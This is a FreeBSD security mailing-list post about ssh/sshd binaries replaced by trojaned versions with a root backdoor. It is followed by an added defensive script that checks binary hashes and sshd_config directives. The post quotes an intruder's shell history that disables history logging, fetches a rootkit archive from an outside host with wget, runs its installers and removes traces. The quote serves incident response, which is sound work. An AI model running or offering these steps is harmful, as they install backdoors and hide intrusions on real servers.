Re: ssh binary modified
> When I try to use scp or ftp I get the following error:
> command-line: line 0: Bad configuration option: PermitLocalCommand
> lost connection
The replaced ssh/sftp is usually an older version.
I have seen such a thing a few times.
ssh/sshd/sftp and a few other binaries are replaced with trojaned ones.
sshd contains a backdoor now, which allows an instant root shell
with a magic password/environment.
/etc/ssh/sshd_config may be overwritten too.
The name of the password logs differ from time to time.
I was able to track a kit, which allows infecting a server with
only a single user interaction, the backdoor password.
Example History:
-------------------
unset HISTFILE
unset HISTSAVE
unset SAVEFILE
cd /tmp
wget wlen.com/w/ssh.tgz
tar xvfz ssh.tgz
rm -rf ssh.tgz
cd ssh
../1
../2
../3
locate sshd
/etc/rc.d/sshd restart
cd ..
rm -rf ssh
ls
more uname.txt
ls -alF
w
who
cd .ssh
ls
-------------------
The user may have left traces;
save .history, /var/log/ and /tmp/.
Possible ways:
a) weak passwords.
b) leaked passwords.
e.g. entered a password on a trojaned PC.
c) exploit of an application (ProFTP is often a culprit)
Kind regards,
- Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany
- [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org]
http://people.freebsd.org/~dinoex/errorlogs/
_______________________________________________
freebsd-security@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"
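The post above recommends preserving traces and describes replaced ssh/sshd binaries and an overwritten sshd_config. The script below is an added example, not code from the original post or from FreeBSD; it shows two defender-side checks an admin can run on a host: a hash baseline of the ssh binaries recorded while the system is known-good and re-verified later, and a scan of sshd_config for directives outside an expected set. The file paths, the temporary fixtures and the allowlist of directives are assumptions for illustration and should be replaced with the administrator's own known-good values.

```shell
#!/bin/sh
# Added example (not from the original mailing-list post).
# Two checks for a host where ssh/sshd may have been replaced:
#   1. record_baseline / verify_baseline: SHA-256 baseline of binaries
#   2. unexpected_directives: sshd_config directives outside an allowlist
# Hypothetical paths and allowlist; adjust to the real system.

hash_file() {
    # Portable SHA-256: FreeBSD ships sha256(1), Linux ships sha256sum(1).
    if command -v sha256 >/dev/null 2>&1; then
        sha256 -q "$1"
    elif command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        openssl dgst -sha256 "$1" | awk '{ print $NF }'
    fi
}

# record_baseline BASELINE FILE...  -> writes "hash path" lines to BASELINE.
# Run this while the system is known-good and keep the file off the host.
record_baseline() {
    baseline=$1; shift
    : > "$baseline"
    for f in "$@"; do
        printf '%s %s\n' "$(hash_file "$f")" "$f" >> "$baseline"
    done
}

# verify_baseline BASELINE -> prints CHANGED/MISSING lines; returns 1 if any.
# (Paths containing spaces are not supported by this simple format.)
verify_baseline() {
    rc=0
    while read -r want path; do
        if [ ! -f "$path" ]; then
            echo "MISSING $path"; rc=1
        elif [ "$(hash_file "$path")" != "$want" ]; then
            echo "CHANGED $path"; rc=1
        fi
    done < "$1"
    return $rc
}

# Lower-case allowlist of sshd_config directives the admin expects (assumption;
# derive it from your own known-good config). sshd treats names case-insensitively.
ALLOWED_DIRECTIVES="port listenaddress protocol hostkey permitrootlogin \
passwordauthentication pubkeyauthentication authorizedkeysfile \
challengeresponseauthentication usepam x11forwarding subsystem allowusers loglevel"

# unexpected_directives CONFIG -> prints directive names not in the allowlist;
# returns 1 if any were found. Comments and blank lines are skipped.
unexpected_directives() {
    found=$(grep -v '^[[:space:]]*#' "$1" | awk 'NF { print tolower($1) }' |
        while read -r d; do
            case " $ALLOWED_DIRECTIVES " in
                *" $d "*) ;;
                *) echo "$d" ;;
            esac
        done)
    [ -z "$found" ] && return 0
    echo "$found"
    return 1
}

# run_demo: constructed fixtures in a temp dir, so the script runs offline.
run_demo() {
    tmp=$(mktemp -d)
    printf 'pretend ssh binary\n'  > "$tmp/ssh"
    printf 'pretend sshd binary\n' > "$tmp/sshd"
    record_baseline "$tmp/baseline" "$tmp/ssh" "$tmp/sshd"
    printf 'replaced ssh binary\n' > "$tmp/ssh"     # simulate a swapped client
    echo "== binary check =="
    verify_baseline "$tmp/baseline" || echo "(baseline mismatch detected)"
    printf 'Port 22\n# comment\nPermitRootLogin no\nUnknownDirective x\n' > "$tmp/sshd_config"
    echo "== sshd_config check =="
    unexpected_directives "$tmp/sshd_config" || echo "(unexpected directive detected)"
    rm -rf "$tmp"
    return 0
}

run_demo
```

A baseline only helps if it was recorded before the compromise and stored somewhere the attacker cannot rewrite; on FreeBSD the base-system mtree specifications or package checksums serve the same purpose for binaries they cover.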